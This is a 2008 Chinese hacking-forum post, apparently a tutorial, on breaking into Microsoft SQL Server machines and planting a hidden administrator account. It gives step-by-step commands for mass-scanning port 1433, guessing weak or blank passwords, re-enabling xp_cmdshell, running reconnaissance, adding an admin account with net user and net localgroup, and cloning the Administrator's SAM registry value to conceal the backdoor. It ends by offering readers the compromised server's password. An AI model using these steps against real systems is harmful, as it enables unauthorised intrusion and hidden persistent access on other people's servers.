|
|
楼主 |
发表于 2008-6-23 19:53:32
|
显示全部楼层
|阅读模式
来自 四川省泸州市
大家好我是hacktale第一次做教程,很紧张。如果有什么做的不好请大家不要怪我。呵呵!
今天我要做的教程是1433入侵服务器+隐藏管理员账号
用到的工具1.s扫描器
2.SQL综合利用工具
3.scansql批量处理工具,或者用X-Scan-v3.3
4.用到sql查询分析器
5.3389连接工具(2003和xp自带有远程连接工具)
大家看我的操作
1.首先用服务器扫一段开了1433端口的ip
2.扫描好之后,1433弱口令猜解工具即上面提到的scansql批量处理工具,或者用X-Scan-v3.3
3.用SQL综合利用工具连接并添加管理员账号
4.用3389连接器
s扫描器s.exe syn ip地址 端口号 /save(保存)
这个大家应该都知道是什么意思吧!
等它扫描一下.syn扫描很快.在xp系统下要打补丁才可以用。我的服务器是2003系统的,不用打补丁就可以用s扫描,看扫出来很多开放1433的IP
扫描完后它会自动保存到他所在的目录下,大家稍等下。看来这个段的IP开放1433端口很多.啊终于扫万了。呵呵
好把IP处理一下,
因为要用到scansql批量处理工具,所以IP段前面要加上scansql
处理完之后,可以将txt文件保存为bat为后缀的文件,为了快点扫到服务器的弱口令,我们可以多保存几个bat文件,好大家看我操作
已经开始破解弱口令了,大家等一下
还没有扫到,可能是有点慢呵呵!
好了我们看下有没有扫到弱口令。大家看扫到弱口令了。[NULL]表示
空口令.
我们用SQL综合利用工具连接一下,随便选个 我这有点卡...我就用服务器连接,服务器连接就是快,呵呵
好连接成功.我们看下能执行dos命令不,不可以
未能找到存储过程 'master..xp_cmdshell'。很多朋友遇到这种情况就不知道怎么办了,我们就要用到sql查询分析器,大家看我的操作,,打开的有点慢.打开了我们连接服务器
然后第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
然后按F5键命令执行完毕....一般情况执行第一步就可以了。好看我操作
可以执行dos命令了,我们查看服务器是什么系统dos口令是type C:\\boot.ini
Windows Server 2003,说明服务器是2003系统.
查看一下服务器是内网还是外网一般我们都要外网的肉鸡,这样可以做很多事
dos口令是ipconfig 看下
Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 210.26.7.88 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 210.26.7.1
说明服务器是外网
说明服务器是外网,查看一下有多少管理员dos口令net user
netstat -an是查看服务器开放的端口,我们要入侵服务器可定要开放3389端口如果没有开,网上有很多开3389的工具。不过很多都要做免杀,我们看下他开了3389没有。
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
说明服务器开了3389端口。我们开始添加管理吧!
net user admin$ !@#$ab1 /add这个就是添加管理员的dos口令admin$是用户名后面加个$号是想在dos下查看不到.密码不满足密码策略的要求。检查最小密码长度、密码复杂性和密码历史的要求。这个也很好解决,密码要复杂一点一般都在6位以上.我们去试下可以了,很多国外的服务器也是这样但是都很简单就搞定了
然后我们提升权限net localgroup administrators admin$ /add这是dos下提升管理的口令,现
我用服务器连接下看好连接成功
下面大家看我的操作
我们来做影藏管理员账号。
首先打开注册表regedit
打开后找到sam
然后添加权限HKEY_LOCAL_MACHINE\\SAM\\SAM
然后按F5刷新下
然后依次点HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
可以看出有人入侵过
我们删掉完成,我们打开注册表f5刷新下
我们从新建个管理员net user hacktale$ !@#$ab1 /add
我们看hacktale$在注册表对应的类型是 406
找到 406 1f4是administrator对应的键值,然后我们将administrator所对应的直下的f直覆盖hacktale$下的F直
然后将406 和hacktale$对应的注册表导出
然后删除hacktale$,然后导入刚才导出的注册表文件
好了隐藏了账号并提升了权限我们注销然后在进一次看看,用hacktale$能进入不可以进入
而且看桌面上多了很多东西,因为我们是以超级管理员登陆的而且不会被人发现.好了教程到此
服务器的密码我不该要的朋友进去拿吧!
下载地址:点击下载 |
|
发表于 2008-6-23 20:57:26
